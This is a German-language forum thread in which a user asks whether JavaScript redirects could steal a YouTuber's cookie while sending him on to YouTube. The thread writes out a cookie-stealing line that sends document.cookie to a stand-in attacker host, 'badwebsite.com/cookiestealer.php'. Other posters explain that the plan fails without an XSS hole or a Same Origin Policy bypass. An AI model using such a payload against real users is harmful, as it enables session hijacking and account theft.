Hallo Leute,

ich habe eine Frage. Kann man mit Javascript den Browser auf mehrere Url's weiterleiten? Z.b so:


-> YouTube - Broadcast Yourself. (http://www.youtube.com/)

%1 Sekunde warten%

-> javascript: document.location="http://www.badwebsite.com/cookiestealer.php?cookie="+document.cookie;

%1 Sekunde warten%

-> http://www.badwebsite.com/404.php


Die Idee wäre das ich z.b einem Youtuber der Link zur http://www.badwebsite.com/index.php gebe.
Dieser geht drauf und wird danach nach Youtube geleitet und sein Cookie wird gestohlen.

Geht das? Oder ist das Mist wo ich hier labere?

Danke für alle Antworten,

mfg Chillerz.

ich habe nicht viel Ahnung davon, aber ich meine, dass das geht.
Einfach in einem speziellen Bereich die "Badwebsite" aufrufen und danach dann auf das ziel weiterleiten. Soweit ich weiß, ist dies eine aufgabe von AJAX,musst du mal nachschauen. Kann aber sein, dass ich Müll rede^^

Ja, du redet Müll.

Der Cookiestealer kann dich per HTTP, JS, Meta Redirect Weiterleiten.

Nur überleg mal, wie du von YT aus auf die Seite des Stealers geleitet werden willst...

Richtig, ohne XSS wird das nichts.

O.k danke Macacity und GregorSamasa :).

Kann geclosed werden.

mfg Chillerz.

Die Cookies anderer Webseiten ohne eine Cross-Site Scripting Lücke zu bekommen ist unmöglich..
Ausser man findet eine Möglichkeit die SOP (Same Origin Policy – Wikipedia (http://de.wikipedia.org/wiki/Same_Origin_Policy)) im Browser zu umgehen...

Danke 0x30. :)

Hört sich interessant an!
Allerdings kann ich mir nicht vorstellen das zu umgehen...
So weit bin ich noch nicht ^^

Chillerz.